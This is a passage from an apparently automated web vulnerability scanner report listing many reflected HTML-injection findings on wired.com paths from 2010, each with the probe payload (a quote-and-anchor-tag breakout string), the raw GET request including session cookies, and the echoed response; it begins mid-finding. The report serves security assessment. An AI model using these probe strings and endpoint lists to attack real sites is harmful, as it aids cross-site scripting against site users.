This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/relatedf606f"><a>222e926617f/content/blogPost/threatlevel_7588 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29392
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:15 GMT
Date: Mon, 22 Nov 2010 01:11:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relatedf606f"><a>222e926617f">
...[SNIP]...

1.28. http://www.wired.com/ajax/widgets/related/content/blogPost/underwire_53528 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/underwire_53528

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3862"><a>16338f02f90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxe3862"><a>16338f02f90/widgets/related/content/blogPost/underwire_53528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:06 GMT
Date: Mon, 22 Nov 2010 01:10:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxe3862"><a>16338f02f90 ss_widgets c_related">
...[SNIP]...

1.29. http://www.wired.com/ajax/widgets/related/content/blogPost/underwire_53528 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/underwire_53528

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb9a4"><a>f176c1e030e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgetseb9a4"><a>f176c1e030e/related/content/blogPost/underwire_53528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:45 GMT
Date: Mon, 22 Nov 2010 01:10:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgetseb9a4"><a>f176c1e030e c_related">
...[SNIP]...

1.30. http://www.wired.com/ajax/widgets/related/content/blogPost/underwire_53528 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/underwire_53528

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a940d"><a>ad6ce4969ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/relateda940d"><a>ad6ce4969ca/content/blogPost/underwire_53528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:01 GMT
Date: Mon, 22 Nov 2010 01:11:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relateda940d"><a>ad6ce4969ca">
...[SNIP]...

1.31. http://www.wired.com/blogs [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /blogs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37e36"><a>663daf42f79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blogs37e36"><a>663daf42f79 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.wired.com/

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29320
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 22:29:37 GMT
Date: Sun, 21 Nov 2010 22:25:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_blogs37e36"><a>663daf42f79">
...[SNIP]...

1.32. http://www.wired.com/blogs/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /blogs/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7458"><a>0bc4e457d49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blogsb7458"><a>0bc4e457d49/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=235
Expires: Sun, 21 Nov 2010 20:14:10 GMT
Date: Sun, 21 Nov 2010 20:10:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_blogsb7458"><a>0bc4e457d49">
...[SNIP]...

1.33. http://www.wired.com/cars [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 808a6"><a>226b4160ebe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars808a6"><a>226b4160ebe HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29298
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:09 GMT
Date: Mon, 22 Nov 2010 01:11:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars808a6"><a>226b4160ebe">
...[SNIP]...

1.34. http://www.wired.com/cars/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 847ce"><a>650bafdb219 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars847ce"><a>650bafdb219/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29299
Vary: Accept-Encoding
Cache-Control: max-age=223
Expires: Sun, 21 Nov 2010 20:15:22 GMT
Date: Sun, 21 Nov 2010 20:11:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars847ce"><a>650bafdb219">
...[SNIP]...

1.35. http://www.wired.com/cars/coolwheels [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/coolwheels

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 215d7"><a>d31fce4364 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars215d7"><a>d31fce4364/coolwheels HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:09:51 GMT
Date: Sun, 21 Nov 2010 23:05:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars215d7"><a>d31fce4364 ss_coolwheels">
...[SNIP]...

1.36. http://www.wired.com/cars/coolwheels [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/coolwheels

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0a5e"><a>3d542f5f695 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars/coolwheelsf0a5e"><a>3d542f5f695 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29323
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:18 GMT
Date: Sun, 21 Nov 2010 23:06:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars ss_coolwheelsf0a5e"><a>3d542f5f695">
...[SNIP]...

1.37. http://www.wired.com/cars/energy [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/energy

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93d8b"><a>cd4df970211 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars93d8b"><a>cd4df970211/energy HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29315
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:09:53 GMT
Date: Sun, 21 Nov 2010 23:05:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars93d8b"><a>cd4df970211 ss_energy">
...[SNIP]...

1.38. http://www.wired.com/cars/energy [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/energy

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a3cd"><a>1fe87d440bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars/energy1a3cd"><a>1fe87d440bf HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29315
Vary: Accept-Encoding
Cache-Control: max-age=554
Expires: Sun, 21 Nov 2010 23:15:34 GMT
Date: Sun, 21 Nov 2010 23:06:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars ss_energy1a3cd"><a>1fe87d440bf">
...[SNIP]...

1.39. http://www.wired.com/cars/futuretransport [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/futuretransport

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5a14"><a>265d8487a92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /carse5a14"><a>265d8487a92/futuretransport HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29333
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:09:58 GMT
Date: Sun, 21 Nov 2010 23:05:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_carse5a14"><a>265d8487a92 ss_futuretransport">
...[SNIP]...

1.40. http://www.wired.com/cars/futuretransport [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/futuretransport

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36c73"><a>e09bc35649e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars/futuretransport36c73"><a>e09bc35649e HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29333
Vary: Accept-Encoding
Cache-Control: max-age=583
Expires: Sun, 21 Nov 2010 23:16:08 GMT
Date: Sun, 21 Nov 2010 23:06:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars ss_futuretransport36c73"><a>e09bc35649e">
...[SNIP]...

1.41. http://www.wired.com/culture [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8402"><a>edd50cf471 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturee8402"><a>edd50cf471 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29238
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:14 GMT
Date: Mon, 22 Nov 2010 01:11:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturee8402"><a>edd50cf471">
...[SNIP]...

1.42. http://www.wired.com/culture/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e53de"><a>40592780ce4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturee53de"><a>40592780ce4/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29241
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 20:15:44 GMT
Date: Sun, 21 Nov 2010 20:11:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturee53de"><a>40592780ce4">
...[SNIP]...

1.43. http://www.wired.com/culture/art [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dbf8"><a>ab6cb8357ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture8dbf8"><a>ab6cb8357ba/art HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29251
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:09:58 GMT
Date: Sun, 21 Nov 2010 23:05:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture8dbf8"><a>ab6cb8357ba ss_art">
...[SNIP]...

1.44. http://www.wired.com/culture/art [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d542"><a>e8d21a02e71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

